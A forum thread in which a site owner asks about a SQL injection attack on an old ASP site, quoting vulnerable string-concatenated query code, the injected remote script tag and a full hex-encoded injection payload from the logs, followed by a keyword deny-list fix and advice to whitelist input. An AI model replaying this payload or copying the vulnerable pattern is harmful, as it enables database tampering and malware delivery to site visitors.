Link to home
Start Free TrialLog in
Avatar of rito1
rito1

asked on

Stored Procedures Prevent Injection Attacks?

Hi All

A website of ours has recently been hit by an injection attack which is corrupting our data within the following line <script src=http://www.dota11 .cn / m.js></script> (added spaces to prevent anyone from clicking it by mistake!)

I have been going through my weblogs and have located where they have tried to perform the attack... Obviously one of our files are vulnerable but inspecting the majority of these files, they actually trigger a stored procedure rather than use inline code.

Please could anyone confirm that I should be looking for inline cone instance and am safe to leave the stored procedure referenced pages as they are?

Is there a cool gadget that can test for vulnerabilities on certain pages or is it more of a painstaking job?

Many thanks,

Rit
Avatar of rito1
rito1

ASKER

Hi,

I am dealing with an ASP written site which is quite dated now.

Here is an example of the way in which it executes a stored procedure... can you see any vulnerabilies in this?...

Many thanks

Rit

Function GetConnection()
      Dim objConn
      Set objConn = Server.CreateObject("ADODB.Connection")
      objConn.Open strDSNless
      Set GetConnection = objConn
End Function

Function GetRecordset(sSQL)
      Dim objConn
'      Response.Write(sSQL & "<br>")
'      Response.Flush
      Set objConn = GetConnection()
      Set GetRecordset = objConn.Execute(sSQL)
      Set objConn = Nothing
End Function

Dim newsID
newsID = Request.QueryString("newsid")

strSQL = "EXECUTE GetNewsItem " & newsID
Set objRS = GetRecordset(strSQL)

the stored procedure for this example looks like this...

CREATE PROCEDURE dbo.GetNewsItem
      @NewsID int
AS
      SELECT
            N.*,
            B.BaseCount,
            E.EmbeddedCount
      FROM
            NewsItems AS N
            LEFT OUTER JOIN
            (
                  SELECT
                        NewsID,
                        COUNT(*) AS BaseCount
                  FROM
                        NewsImages
                  WHERE
                        NewsID = @NewsID AND
                        Embedded = 0
                  GROUP BY
                        NewsID
            ) AS B ON N.NewsID = B.NewsID
            LEFT OUTER JOIN
            (
                  SELECT
                        NewsID,
                        COUNT(*) AS EmbeddedCount
                  FROM
                        NewsImages
                  WHERE
                        NewsID = @NewsID AND
                        Embedded = 1
                  GROUP BY
                        NewsID
            ) AS E ON N.NewsID = E.NewsID
      WHERE
            N.NewsID = @NewsID

GO
ASKER CERTIFIED SOLUTION
Avatar of dosth
dosth
Flag of India image
Link to home
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Start Free Trial
Avatar of rito1
rito1

ASKER

Hi dosth,

Thanks very much. My VB is a little poor... could you briefly explain what your code does?

would it stop the following request....

show_image.asp?imageid=2954&newsid=450';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E0064006F0074006100310031002E0063006E002F006D002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);
SOLUTION
Avatar of greengo
greengo
Flag of United Kingdom of Great Britain and Northern Ireland image
Link to home
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Start Free Trial
Avatar of dosth
dosth
Flag of India image
yes, it will you see i have added this EXEC(, i added all ddl commands and few dml commant to exclude

so anything that comes in querystring will not be deep trhu
sqlArray = "select%20|delete%20|update%20|insert%20|create%20|alter%20|drop%20|truncate%20|sp_|declare%20|exec("
Avatar of rito1
rito1

ASKER

Excellent, thanks both.
Avatar of dosth
dosth
Flag of India image
thanks for the points
Avatar of greengo
greengo
Flag of United Kingdom of Great Britain and Northern Ireland image
Likewise, thanks for the grade.

Sorry @dosth, hope you didn't think that I was attacking your solution, I wasn't. I was just trying to offer an alternative viewpoint, something that I believe is referred to as "accept known good". I'm sure your solution does the job, I wasn't doubting that for a moment. I was just trying to point out that this approach of denying input that is regarded "bad", rather than only allowing input that is regarded as "good" i.e. only digits in number fields, holds a greater potential to fall foul of new exploits as they become available.

There is some very interesting reading for us all on the following site:

http://www.owasp.org/index.php/Top_10_2007
Avatar of dosth
dosth
Flag of India image
i agree, my solution is good to stop attack immediately until we figure out best approach